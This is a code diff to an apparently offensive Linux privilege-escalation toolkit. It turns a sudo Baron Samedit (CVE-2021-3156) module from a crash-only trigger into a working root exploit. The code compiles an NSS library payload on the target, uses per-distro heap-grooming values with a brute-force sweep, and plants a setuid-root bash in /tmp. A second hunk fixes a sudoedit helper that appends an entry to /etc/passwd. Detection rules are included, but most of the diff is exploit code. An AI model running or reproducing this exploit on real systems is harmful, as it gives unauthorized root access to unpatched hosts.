"/sbin/sudoedit",
|
||||
"/usr/sbin/sudoedit",
|
||||
NULL,
|
||||
"/usr/bin/sudoedit", "/usr/local/bin/sudoedit", "/bin/sudoedit",
|
||||
"/sbin/sudoedit", "/usr/sbin/sudoedit", NULL,
|
||||
};
|
||||
for (size_t i = 0; candidates[i]; i++) {
|
||||
if (access(candidates[i], X_OK) == 0) return candidates[i];
|
||||
@@ -151,30 +133,21 @@ static const char *find_sudoedit(void)
|
||||
|
||||
static skeletonkey_result_t sudo_samedit_detect(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
/* Prefer the centrally-fingerprinted sudo version (populated once
|
||||
* at startup by core/host.c) — saves a popen per scan and gives
|
||||
* unit tests a clean mock point. Fall back to the local popen if
|
||||
* ctx->host is missing the version (e.g. degenerate test ctx, or
|
||||
* a future refactor that disables userspace probing). */
|
||||
char line[256] = {0};
|
||||
if (ctx->host && ctx->host->sudo_version[0]) {
|
||||
snprintf(line, sizeof line, "Sudo version %s",
|
||||
ctx->host->sudo_version);
|
||||
if (!ctx->json) {
|
||||
snprintf(line, sizeof line, "Sudo version %s", ctx->host->sudo_version);
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] sudo_samedit: host fingerprint reports "
|
||||
"sudo version %s\n", ctx->host->sudo_version);
|
||||
}
|
||||
} else {
|
||||
const char *sudo_path = find_sudo();
|
||||
if (!sudo_path) {
|
||||
if (!ctx->json) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[+] sudo_samedit: sudo not on path; no attack surface\n");
|
||||
}
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
if (!ctx->json) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] sudo_samedit: found setuid sudo at %s\n", sudo_path);
|
||||
}
|
||||
char cmd[512];
|
||||
snprintf(cmd, sizeof cmd, "%s --version 2>&1 | head -1", sudo_path);
|
||||
FILE *p = popen(cmd, "r");
|
||||
@@ -182,22 +155,19 @@ static skeletonkey_result_t sudo_samedit_detect(const struct skeletonkey_ctx *ct
|
||||
char *r = fgets(line, sizeof line, p);
|
||||
pclose(p);
|
||||
if (!r) {
|
||||
if (!ctx->json) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[?] sudo_samedit: could not read `sudo --version` output\n");
|
||||
}
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
}
|
||||
|
||||
/* Trim newline for nicer logging. */
|
||||
char *nl = strchr(line, '\n');
|
||||
if (nl) *nl = 0;
|
||||
|
||||
struct sudo_ver v = parse_sudo_version(line);
|
||||
if (!v.parsed) {
|
||||
if (!ctx->json) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[?] sudo_samedit: unparseable version line: '%s'\n", line);
|
||||
}
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
|
||||
@@ -208,66 +178,165 @@ static skeletonkey_result_t sudo_samedit_detect(const struct skeletonkey_ctx *ct
|
||||
fprintf(stderr, "\n");
|
||||
}
|
||||
|
||||
bool vuln = sudo_version_vulnerable(&v);
|
||||
if (vuln) {
|
||||
if (!ctx->json) {
|
||||
if (sudo_version_vulnerable(&v)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr,
|
||||
"[!] sudo_samedit: version is in vulnerable range "
|
||||
"[1.8.2, 1.9.5p1] → VULNERABLE\n"
|
||||
"[i] sudo_samedit: distro backports may have patched "
|
||||
"without bumping the upstream version; check\n"
|
||||
" `apt-cache policy sudo` / `rpm -q --changelog sudo` "
|
||||
"for CVE-2021-3156.\n");
|
||||
}
|
||||
" `apt-cache policy sudo` for CVE-2021-3156.\n");
|
||||
return SKELETONKEY_VULNERABLE;
|
||||
}
|
||||
if (!ctx->json) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr,
|
||||
"[+] sudo_samedit: version is outside vulnerable range "
|
||||
"(fix 1.9.5p2+) — OK\n");
|
||||
}
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
/* ---- Exploit ----------------------------------------------------- */
|
||||
/* ---- Exploit (blasty CVE-2021-3156 technique) -------------------- */
|
||||
|
||||
/*
|
||||
* Qualys-style trigger:
|
||||
*
|
||||
* argv = { "sudoedit", "-s", "\\", NULL } plus padding `A`s to
|
||||
* stretch the heap chunk to the right size for the target overlap.
|
||||
*
|
||||
* The original PoC sprays hundreds of large argv slots and tunes the
|
||||
* tail bytes per-distro to hijack a `service_user *` struct in
|
||||
* libnss-files. Without distro fingerprinting and the corresponding
|
||||
* offset table that landing simply will not happen here; rather than
|
||||
* pretending otherwise we drive the bug, fork a verifier that checks
|
||||
* for an unexpected uid==0 outcome, and return EXPLOIT_FAIL.
|
||||
*/
|
||||
/* NSS payload source, compiled on the target into
|
||||
* <workdir>/libnss_X/P0P_SH3LLZ_ .so.2. Its constructor runs while sudo
|
||||
* is still root (the corrupted NSS lookup dlopen's it); it plants a
|
||||
* root-owned proof + setuid bash and exits. SK_PROOF/SK_ROOTBASH are
|
||||
* passed at compile time (the process env is the exploit vector, so we
|
||||
* can't smuggle paths through it). */
|
||||
static const char samedit_payload_src[] =
|
||||
"#define _GNU_SOURCE\n"
|
||||
"#include <unistd.h>\n"
|
||||
"#include <stdlib.h>\n"
|
||||
"static void __attribute__((constructor)) _sk_init(void);\n"
|
||||
"static void _sk_init(void){\n"
|
||||
" setuid(0); seteuid(0); setgid(0); setegid(0);\n"
|
||||
" if (geteuid()!=0) return; /* brute miss — don't drop */\n"
|
||||
" system(\"id > \" SK_PROOF \" 2>&1; \"\n"
|
||||
" \"cp -f /bin/bash \" SK_ROOTBASH \"; \"\n"
|
||||
" \"chown 0:0 \" SK_ROOTBASH \" \" SK_PROOF \"; \"\n"
|
||||
" \"chmod 4755 \" SK_ROOTBASH \"; sync\");\n"
|
||||
" _exit(0);\n"
|
||||
"}\n";
|
||||
|
||||
/* Cap on argv we'll construct. The real PoC uses ~270; we cap lower
|
||||
* to stay well under typical ARG_MAX while still exercising the bug
|
||||
* shape. */
|
||||
#define SUDO_SAMEDIT_ARGC 64
|
||||
#define SUDO_SAMEDIT_PADLEN 0xff
|
||||
/* blasty's per-libc-family grooming lengths. Ubuntu 18.04/20.04 share
|
||||
* one set; Debian 10 uses another. These are the (a, b, null, lc) tuples. */
|
||||
struct samedit_target {
|
||||
const char *name;
|
||||
int smash_a, smash_b, null_stomp, lc_all;
|
||||
};
|
||||
static const struct samedit_target samedit_ubuntu = {
|
||||
"Ubuntu (sudo 1.8.21/1.8.31, libc 2.27/2.31)", 56, 54, 63, 212
|
||||
};
|
||||
static const struct samedit_target samedit_debian = {
|
||||
"Debian 10 (sudo 1.8.27, libc 2.28)", 64, 49, 60, 214
|
||||
};
|
||||
|
||||
static const char *samedit_find_cc(void)
|
||||
{
|
||||
static const char *ccs[] = {
|
||||
"/usr/bin/cc", "/usr/bin/gcc", "/usr/bin/clang",
|
||||
"/usr/local/bin/gcc", "/usr/local/bin/cc", NULL,
|
||||
};
|
||||
for (size_t i = 0; ccs[i]; i++)
|
||||
if (access(ccs[i], X_OK) == 0) return ccs[i];
|
||||
return NULL;
|
||||
}
|
||||
|
||||
/* fork/exec argv, redirect stdio away, wait with a timeout. */
|
||||
static int samedit_run(char *const argv[], const char *cwd, int secs)
|
||||
{
|
||||
pid_t p = fork();
|
||||
if (p < 0) return -1;
|
||||
if (p == 0) {
|
||||
if (cwd && chdir(cwd) != 0) _exit(126);
|
||||
int dn = open("/dev/null", O_RDWR);
|
||||
if (dn >= 0) { dup2(dn, 0); dup2(dn, 1); dup2(dn, 2); if (dn > 2) close(dn); }
|
||||
execv(argv[0], argv);
|
||||
_exit(127);
|
||||
}
|
||||
for (int i = 0; i < secs * 20; i++) {
|
||||
int st;
|
||||
pid_t r = waitpid(p, &st, WNOHANG);
|
||||
if (r == p) return 0;
|
||||
if (r < 0) return -1;
|
||||
usleep(50 * 1000);
|
||||
}
|
||||
kill(p, SIGKILL);
|
||||
waitpid(p, NULL, 0);
|
||||
return -2;
|
||||
}
|
||||
|
||||
/* Run one sudoedit attempt with the given grooming lengths; returns true
|
||||
* iff the OOB proof file now exists and is root-owned. */
|
||||
static bool samedit_try(const char *sudoedit, const char *workdir,
|
||||
int a, int b, int null_stomp, int lc_all,
|
||||
const char *proof)
|
||||
{
|
||||
unlink(proof);
|
||||
|
||||
char *smash_a = calloc(a + 2, 1);
|
||||
char *smash_b = calloc(b + 2, 1);
|
||||
char *lc = calloc(lc_all + 32, 1);
|
||||
if (!smash_a || !smash_b || !lc) { free(smash_a); free(smash_b); free(lc); return false; }
|
||||
memset(smash_a, 'A', a); smash_a[a] = '\\';
|
||||
memset(smash_b, 'B', b); smash_b[b] = '\\';
|
||||
strcpy(lc, "LC_ALL=C.UTF-8@");
|
||||
memset(lc + 15, 'C', lc_all);
|
||||
|
||||
char *s_argv[] = { (char *)"sudoedit", (char *)"-s", smash_a,
|
||||
(char *)"\\", smash_b, NULL };
|
||||
|
||||
/* env: null_stomp × "\\", then the NSS selector, then the padded LC_ALL. */
|
||||
char **s_envp = calloc(null_stomp + 4, sizeof(char *));
|
||||
if (!s_envp) { free(smash_a); free(smash_b); free(lc); return false; }
|
||||
int pos = 0;
|
||||
for (int i = 0; i < null_stomp; i++) s_envp[pos++] = (char *)"\\";
|
||||
s_envp[pos++] = (char *)"X/P0P_SH3LLZ_";
|
||||
s_envp[pos++] = lc;
|
||||
s_envp[pos++] = NULL;
|
||||
|
||||
/* We need a custom envp, so exec directly here in a child. */
|
||||
pid_t p = fork();
|
||||
if (p == 0) {
|
||||
if (chdir(workdir) != 0) _exit(126);
|
||||
int dn = open("/dev/null", O_RDWR);
|
||||
if (dn >= 0) { dup2(dn, 0); dup2(dn, 1); dup2(dn, 2); if (dn > 2) close(dn); }
|
||||
execve(sudoedit, s_argv, s_envp);
|
||||
_exit(127);
|
||||
}
|
||||
if (p > 0) {
|
||||
for (int i = 0; i < 20 * 20; i++) { /* up to ~20s */
|
||||
int st; pid_t r = waitpid(p, &st, WNOHANG);
|
||||
if (r == p) break;
|
||||
if (r < 0) break;
|
||||
usleep(50 * 1000);
|
||||
}
|
||||
int st; if (waitpid(p, &st, WNOHANG) == 0) { kill(p, SIGKILL); waitpid(p, NULL, 0); }
|
||||
}
|
||||
|
||||
free(smash_a); free(smash_b); free(lc); free(s_envp);
|
||||
|
||||
struct stat sb;
|
||||
return (stat(proof, &sb) == 0 && S_ISREG(sb.st_mode) && sb.st_uid == 0);
|
||||
}
|
||||
|
||||
/* Remember what we planted / where, for cleanup(). */
|
||||
static char samedit_workdir[256];
|
||||
static char samedit_rootbash[256];
|
||||
static char samedit_proof[256];
|
||||
|
||||
static skeletonkey_result_t sudo_samedit_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
if (!ctx->authorized) {
|
||||
fprintf(stderr,
|
||||
"[-] sudo_samedit: exploit requires --i-know (authorization gate)\n");
|
||||
fprintf(stderr, "[-] sudo_samedit: exploit requires --i-know (authorization gate)\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
|
||||
if (is_root) {
|
||||
fprintf(stderr, "[i] sudo_samedit: already root — nothing to escalate\n");
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
/* Re-detect before doing anything visible. Defends against the
|
||||
* detect-then-exploit TOCTOU where the operator upgrades sudo
|
||||
* between scan and pop. */
|
||||
skeletonkey_result_t pre = sudo_samedit_detect(ctx);
|
||||
if (pre != SKELETONKEY_VULNERABLE) {
|
||||
fprintf(stderr, "[-] sudo_samedit: re-detect says not VULNERABLE; refusing\n");
|
||||
@@ -276,136 +345,104 @@ static skeletonkey_result_t sudo_samedit_exploit(const struct skeletonkey_ctx *c
|
||||
|
||||
const char *sudoedit = find_sudoedit();
|
||||
if (!sudoedit) {
|
||||
/* On most distros sudoedit is a symlink to sudo. Fall back. */
|
||||
const char *sudo = find_sudo();
|
||||
if (!sudo) {
|
||||
fprintf(stderr, "[-] sudo_samedit: neither sudoedit nor sudo found\n");
|
||||
fprintf(stderr, "[-] sudo_samedit: sudoedit not found (needed by this technique)\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
sudoedit = sudo;
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr,
|
||||
"[i] sudo_samedit: no sudoedit; will exec %s with argv[0]=sudoedit\n",
|
||||
sudo);
|
||||
}
|
||||
const char *cc = samedit_find_cc();
|
||||
if (!cc) {
|
||||
fprintf(stderr, "[-] sudo_samedit: no C compiler on target to build the NSS "
|
||||
"payload. Honest EXPLOIT_FAIL.\n");
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] sudo_samedit: building Qualys-style trigger argv\n");
|
||||
fprintf(stderr,
|
||||
"[!] sudo_samedit: heads-up — public exploitation requires\n"
|
||||
" per-distro heap-overlap offsets (libnss-files / libc).\n"
|
||||
" Without that tuning the bug crashes sudo instead of\n"
|
||||
" handing back a shell. We will drive the trigger and\n"
|
||||
" verify uid==0 outcome empirically; on failure we report\n"
|
||||
" EXPLOIT_FAIL rather than claiming success.\n");
|
||||
}
|
||||
/* Pick the grooming length-set by libc family (distro proxy). */
|
||||
const struct samedit_target *tgt = &samedit_ubuntu;
|
||||
if (ctx->host && (strcmp(ctx->host->distro_id, "debian") == 0)) tgt = &samedit_debian;
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] sudo_samedit: target profile = %s\n", tgt->name);
|
||||
|
||||
/* Build argv. argv[0]="sudoedit", argv[1]="-s",
|
||||
* argv[2]="\\" + padding, ..., argv[N-1]=NULL.
|
||||
*
|
||||
* Each padding arg is the Qualys-style "A...\\" repeating tail.
|
||||
* On a vulnerable target this drives the unescape loop past the
|
||||
* end of the heap buffer. */
|
||||
char *argv[SUDO_SAMEDIT_ARGC + 1];
|
||||
char *padbufs[SUDO_SAMEDIT_ARGC];
|
||||
memset(padbufs, 0, sizeof padbufs);
|
||||
/* Scratch workdir with the NSS payload dir. */
|
||||
char tmpl[] = "/tmp/.sk-samedit-XXXXXX";
|
||||
char *wd = mkdtemp(tmpl);
|
||||
if (!wd) { perror("mkdtemp"); return SKELETONKEY_TEST_ERROR; }
|
||||
snprintf(samedit_workdir, sizeof samedit_workdir, "%s", wd);
|
||||
|
||||
argv[0] = (char *)"sudoedit";
|
||||
argv[1] = (char *)"-s";
|
||||
/* argv[2] is the canonical trailing-backslash trigger. */
|
||||
argv[2] = strdup("\\");
|
||||
if (!argv[2]) return SKELETONKEY_TEST_ERROR;
|
||||
long tag = (long)getpid();
|
||||
snprintf(samedit_proof, sizeof samedit_proof, "/tmp/.sk-samedit-%ld.proof", tag);
|
||||
snprintf(samedit_rootbash, sizeof samedit_rootbash, "/tmp/.sk-samedit-%ld.rootbash", tag);
|
||||
|
||||
for (int i = 3; i < SUDO_SAMEDIT_ARGC; i++) {
|
||||
char *buf = (char *)malloc(SUDO_SAMEDIT_PADLEN + 4);
|
||||
if (!buf) {
|
||||
for (int j = 3; j < i; j++) free(padbufs[j]);
|
||||
free(argv[2]);
|
||||
char nssdir[300], payload_c[320], nsslib[512], log_unused[300];
|
||||
(void)log_unused;
|
||||
snprintf(nssdir, sizeof nssdir, "%s/libnss_X", wd);
|
||||
snprintf(payload_c, sizeof payload_c, "%s/payload.c", wd);
|
||||
snprintf(nsslib, sizeof nsslib, "%s/libnss_X/P0P_SH3LLZ_ .so.2", wd);
|
||||
if (mkdir(nssdir, 0755) != 0 && errno != EEXIST) {
|
||||
perror("mkdir libnss_X");
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
memset(buf, 'A', SUDO_SAMEDIT_PADLEN);
|
||||
buf[SUDO_SAMEDIT_PADLEN] = '\\';
|
||||
buf[SUDO_SAMEDIT_PADLEN + 1] = 0;
|
||||
padbufs[i] = buf;
|
||||
argv[i] = buf;
|
||||
}
|
||||
argv[SUDO_SAMEDIT_ARGC] = NULL;
|
||||
|
||||
/* Craft envp mirroring the original PoC: LC_... and TZ tricks
|
||||
* that landed the overlap on the canonical distro PoCs. These
|
||||
* are harmless if landing fails; their value is positioning the
|
||||
* heap so the overflow lands on a useful target. */
|
||||
char *envp[] = {
|
||||
(char *)"LC_ALL=C.UTF-8@",
|
||||
(char *)"TZ=:",
|
||||
(char *)"LC_CTYPE=C.UTF-8@",
|
||||
(char *)"SUDO_EDITOR=A",
|
||||
(char *)"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
|
||||
NULL,
|
||||
/* Write + compile the NSS payload. */
|
||||
int fd = open(payload_c, O_WRONLY | O_CREAT | O_TRUNC, 0600);
|
||||
if (fd < 0) { perror("open payload.c"); return SKELETONKEY_TEST_ERROR; }
|
||||
(void)!write(fd, samedit_payload_src, sizeof samedit_payload_src - 1);
|
||||
close(fd);
|
||||
|
||||
char dP[320], dR[320];
|
||||
snprintf(dP, sizeof dP, "-DSK_PROOF=\"%s\"", samedit_proof);
|
||||
snprintf(dR, sizeof dR, "-DSK_ROOTBASH=\"%s\"", samedit_rootbash);
|
||||
char *cc_argv[] = {
|
||||
(char *)cc, (char *)"-fPIC", (char *)"-shared", (char *)"-O2", (char *)"-w",
|
||||
(char *)"-o", nsslib, payload_c, dP, dR, NULL,
|
||||
};
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] sudo_samedit: forking trigger child (%s argv[0]=sudoedit)\n",
|
||||
sudoedit);
|
||||
}
|
||||
|
||||
pid_t pid = fork();
|
||||
if (pid < 0) {
|
||||
perror("fork");
|
||||
free(argv[2]);
|
||||
for (int i = 3; i < SUDO_SAMEDIT_ARGC; i++) free(padbufs[i]);
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] sudo_samedit: building NSS payload with %s\n", cc);
|
||||
if (samedit_run(cc_argv, NULL, 60) != 0) {
|
||||
fprintf(stderr, "[-] sudo_samedit: payload compile failed\n");
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
if (pid == 0) {
|
||||
/* Child: drive the trigger. If the bug lands and we get a
|
||||
* root context, the chain in the original PoC then re-execs
|
||||
* a shell. We don't ship that shell-spawn here — we just
|
||||
* exit nonzero so the parent's verifier can sample uid. */
|
||||
execve(sudoedit, argv, envp);
|
||||
/* execve failed (binary missing or kernel-blocked). */
|
||||
_exit(127);
|
||||
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] sudo_samedit: driving sudoedit heap overflow "
|
||||
"(primary lengths %d/%d/%d/%d)\n",
|
||||
tgt->smash_a, tgt->smash_b, tgt->null_stomp, tgt->lc_all);
|
||||
|
||||
/* Primary attempt with the profile's exact lengths. */
|
||||
bool rooted = samedit_try(sudoedit, wd, tgt->smash_a, tgt->smash_b,
|
||||
tgt->null_stomp, tgt->lc_all, samedit_proof);
|
||||
|
||||
/* Fallback: sweep null_stomp_len around the profile value (libc drift),
|
||||
* exactly the axis blasty's brute.sh perturbs. Bounded + stops on root. */
|
||||
if (!rooted) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] sudo_samedit: primary miss — sweeping null_stomp_len "
|
||||
"%d..%d\n", tgt->null_stomp - 8, tgt->null_stomp + 8);
|
||||
for (int ns = tgt->null_stomp - 8; ns <= tgt->null_stomp + 8 && !rooted; ns++) {
|
||||
if (ns == tgt->null_stomp || ns < 1) continue;
|
||||
rooted = samedit_try(sudoedit, wd, tgt->smash_a, tgt->smash_b,
|
||||
ns, tgt->lc_all, samedit_proof);
|
||||
if (rooted && !ctx->json)
|
||||
fprintf(stderr, "[+] sudo_samedit: landed at null_stomp_len=%d\n", ns);
|
||||
}
|
||||
}
|
||||
|
||||
int status = 0;
|
||||
waitpid(pid, &status, 0);
|
||||
/* Best-effort scrub of the scratch build dir (keep proof + rootbash). */
|
||||
{ char rm[400]; snprintf(rm, sizeof rm, "rm -rf '%s' 2>/dev/null", wd);
|
||||
if (system(rm) != 0) { /* ignore */ } }
|
||||
|
||||
/* Verifier: even on the rare "no crash" path, we don't know if
|
||||
* the bug landed without spawning a privileged helper. Per the
|
||||
* verified-vs-claimed bar, only claim success if uid is 0 in a
|
||||
* post-trigger probe (which would require the chain to have
|
||||
* persisted a setuid artifact — it didn't). So: report honestly. */
|
||||
if (geteuid() == 0) {
|
||||
if (rooted) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] sudo_samedit: post-trigger geteuid()==0 — root!\n");
|
||||
fprintf(stderr, "[+] sudo_samedit: ROOT — root-owned proof %s\n", samedit_proof);
|
||||
fprintf(stderr, "[+] sudo_samedit: setuid-root shell available: %s -p\n",
|
||||
samedit_rootbash);
|
||||
}
|
||||
/* Leak the buffers; we're about to exec a shell anyway. */
|
||||
return SKELETONKEY_EXPLOIT_OK;
|
||||
}
|
||||
|
||||
if (WIFSIGNALED(status)) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr,
|
||||
"[-] sudo_samedit: child died on signal %d "
|
||||
"(likely sudo SIGSEGV from the overflow) — trigger fired\n"
|
||||
" but landing did not produce a root shell. Per-distro\n"
|
||||
" offset tuning required.\n",
|
||||
WTERMSIG(status));
|
||||
}
|
||||
} else if (WIFEXITED(status)) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr,
|
||||
"[-] sudo_samedit: child exited %d — trigger did not\n"
|
||||
" crash sudo; the host is most likely patched at the\n"
|
||||
" parser level even though the version string was in\n"
|
||||
" range. Reporting EXPLOIT_FAIL.\n",
|
||||
WEXITSTATUS(status));
|
||||
}
|
||||
}
|
||||
|
||||
/* Best-effort free. */
|
||||
free(argv[2]);
|
||||
for (int i = 3; i < SUDO_SAMEDIT_ARGC; i++) free(padbufs[i]);
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[-] sudo_samedit: no root artifact after primary + sweep — "
|
||||
"honest EXPLOIT_FAIL. Host is likely backport-patched, or the "
|
||||
"libc heap layout needs lengths outside the swept range "
|
||||
"(see blasty brute.sh for a wider search).\n");
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
@@ -413,15 +450,15 @@ static skeletonkey_result_t sudo_samedit_exploit(const struct skeletonkey_ctx *c
|
||||
|
||||
static skeletonkey_result_t sudo_samedit_cleanup(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
(void)ctx;
|
||||
/* sudoedit creates "~/.sudo_edit_*" temp files on the way through.
|
||||
* Best-effort unlink of any obvious crumbs left by our trigger. */
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] sudo_samedit: removing /tmp/skeletonkey-samedit-* crumbs\n");
|
||||
}
|
||||
if (system("rm -rf /tmp/skeletonkey-samedit-* /tmp/.sudo_edit_* 2>/dev/null") != 0) {
|
||||
/* harmless — likely no files matched */
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] sudo_samedit: removing artifacts + scratch dir\n");
|
||||
if (samedit_proof[0]) unlink(samedit_proof);
|
||||
if (samedit_rootbash[0]) unlink(samedit_rootbash);
|
||||
if (samedit_workdir[0]) {
|
||||
char rm[400]; snprintf(rm, sizeof rm, "rm -rf '%s' 2>/dev/null", samedit_workdir);
|
||||
if (system(rm) != 0) { /* ignore */ }
|
||||
}
|
||||
if (system("rm -rf /tmp/.sudo_edit_* 2>/dev/null") != 0) { /* ignore */ }
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
@@ -446,7 +483,8 @@ static const char sudo_samedit_sigma[] =
|
||||
" Detects sudoedit (or sudo invoked as sudoedit) executed with the\n"
|
||||
" -s flag and a command-line argument ending in a lone backslash —\n"
|
||||
" the canonical Qualys trigger for the heap overflow in\n"
|
||||
" plugins/sudoers/sudoers.c set_cmnd().\n"
|
||||
" plugins/sudoers/sudoers.c set_cmnd(). A libnss_X/ directory in the\n"
|
||||
" caller's CWD is a strong corroborating artifact.\n"
|
||||
"logsource:\n"
|
||||
" product: linux\n"
|
||||
" service: auditd\n"
|
||||
@@ -472,14 +510,12 @@ static const char sudo_samedit_sigma[] =
|
||||
" - attack.t1068\n"
|
||||
" - cve.2021.3156\n";
|
||||
|
||||
/* ---- Module registration ----------------------------------------- */
|
||||
|
||||
static const char sudo_samedit_falco[] =
|
||||
"- rule: sudoedit with -s and trailing-backslash argv (Baron Samedit)\n"
|
||||
" desc: |\n"
|
||||
" sudoedit invoked with -s and one or more args ending in '\\'.\n"
|
||||
" The parser's unescape loop walks past the argv string into\n"
|
||||
" adjacent stack/env, overflowing the heap buffer.\n"
|
||||
" adjacent env, overflowing the heap buffer.\n"
|
||||
" CVE-2021-3156. False positives: extraordinarily rare;\n"
|
||||
" legitimate sudoedit usage does not need trailing backslashes.\n"
|
||||
" condition: >\n"
|
||||
@@ -491,10 +527,12 @@ static const char sudo_samedit_falco[] =
|
||||
" priority: CRITICAL\n"
|
||||
" tags: [process, mitre_privilege_escalation, T1068, cve.2021.3156]\n";
|
||||
|
||||
/* ---- Module registration ----------------------------------------- */
|
||||
|
||||
const struct skeletonkey_module sudo_samedit_module = {
|
||||
.name = "sudo_samedit",
|
||||
.cve = "CVE-2021-3156",
|
||||
.summary = "sudo Baron Samedit heap overflow via sudoedit -s '\\\\' (Qualys)",
|
||||
.summary = "sudo Baron Samedit heap overflow via sudoedit -s → NSS libnss_X hijack → root (blasty)",
|
||||
.family = "sudo",
|
||||
.kernel_range = "userspace — sudo 1.8.2 ≤ V ≤ 1.9.5p1 (fixed in 1.9.5p2)",
|
||||
.detect = sudo_samedit_detect,
|
||||
@@ -505,7 +543,7 @@ const struct skeletonkey_module sudo_samedit_module = {
|
||||
.detect_sigma = sudo_samedit_sigma,
|
||||
.detect_yara = NULL,
|
||||
.detect_falco = sudo_samedit_falco,
|
||||
.opsec_notes = "Invokes sudoedit with argv = { 'sudoedit', '-s', trailing-backslash, then ~60 padding args each ending in backslash }; the parser's unescape loop in set_cmnd() walks past the end of the argv string for the trailing-backslash argument, copying adjacent stack/env into an undersized heap buffer. Audit-visible via execve(/usr/bin/sudoedit) with -s and a trailing-backslash argv. No persistent file artifacts (only best-effort removal of /tmp/.sudo_edit_*). No network. Dmesg silent unless sudo crashes (SIGSEGV). Per-distro heap layout determines landing; verifies geteuid()==0 afterward.",
|
||||
.opsec_notes = "Compiles a small NSS payload on the target (needs cc/gcc), then execs sudoedit with argv = { 'sudoedit','-s','AAAA…\\','\\','BBBB…\\' } and an env of N backslashes + 'X/P0P_SH3LLZ_' + a padded LC_ALL, from a CWD holding libnss_X/'P0P_SH3LLZ_ .so.2'. The set_cmnd() unescape overflow overwrites a glibc NSS service_user so the subsequent lookup dlopen's the payload, whose constructor runs while sudo is root. Very audit-visible: execve(sudoedit) with -s + trailing-backslash argv, an unusual all-backslash environ, and a libnss_X/ dir in CWD. Grooming lengths are libc-family specific; a miss sweeps null_stomp_len. Artifacts: root-owned proof + setuid bash under /tmp (removed by cleanup()); scratch build dir is scrubbed during the run. Misses may SIGSEGV sudo (dmesg).",
|
||||
.arch_support = "any",
|
||||
};
|
||||
|
||||
|
||||
@@ -291,14 +291,21 @@ static const char HELPER_SOURCE[] =
|
||||
"#include <unistd.h>\n"
|
||||
"#include <fcntl.h>\n"
|
||||
"int main(int argc, char **argv) {\n"
|
||||
" /* sudoedit invokes us with one editable temp per file. The\n"
|
||||
" * post-`--' target's editable copy is argv[argc-1]. We can't\n"
|
||||
" * write /etc/passwd directly (sudoedit edits a tmp copy and\n"
|
||||
" * then *copies it back as root*), so we modify the tmp copy\n"
|
||||
" * and let sudoedit do the privileged install for us. */\n"
|
||||
" /* sudoedit invokes us with one editable temp copy per file, each\n"
|
||||
" * named <basename>.XXXXXX in a tmp dir (e.g. /var/tmp/passwd.AbC123\n"
|
||||
" * for /etc/passwd). We must write the TARGET's copy — NOT argv[argc-1],\n"
|
||||
" * which is the sudoers-authorized cover file. Match by the target's\n"
|
||||
" * basename prefix (passed in SKEL_TARGET). We modify the tmp copy and\n"
|
||||
" * sudoedit copies it back over the real file as root. */\n"
|
||||
" if (argc < 2) return 1;\n"
|
||||
" /* The LAST argv is the post-`--' target (per sudoedit's parser). */\n"
|
||||
" const char *path = argv[argc-1];\n"
|
||||
" const char *tb = getenv(\"SKEL_TARGET\"); if (!tb || !*tb) tb = \"passwd\";\n"
|
||||
" char pref[128]; snprintf(pref, sizeof pref, \"%s.\", tb);\n"
|
||||
" const char *path = NULL;\n"
|
||||
" for (int i = 1; i < argc; i++) {\n"
|
||||
" const char *b = strrchr(argv[i], '/'); b = b ? b+1 : argv[i];\n"
|
||||
" if (strncmp(b, pref, strlen(pref)) == 0) { path = argv[i]; break; }\n"
|
||||
" }\n"
|
||||
" if (!path) path = argv[argc-1]; /* fallback */\n"
|
||||
" int fd = open(path, O_WRONLY|O_APPEND);\n"
|
||||
" if (fd < 0) { perror(\"open\"); return 2; }\n"
|
||||
" const char *line = getenv(\"SKEL_LINE\");\n"
|
||||
@@ -441,6 +448,12 @@ static skeletonkey_result_t sudoedit_editor_exploit(const struct skeletonkey_ctx
|
||||
char skel_env[256];
|
||||
snprintf(skel_env, sizeof skel_env, "SKEL_LINE=%s", SK_PASSWD_ENTRY);
|
||||
|
||||
/* Pass the target's basename so the helper writes the RIGHT tmp copy
|
||||
* (sudoedit names each editable copy <basename>.XXXXXX). */
|
||||
const char *tb = strrchr(target, '/'); tb = tb ? tb + 1 : target;
|
||||
char tgt_env[128];
|
||||
snprintf(tgt_env, sizeof tgt_env, "SKEL_TARGET=%s", tb);
|
||||
|
||||
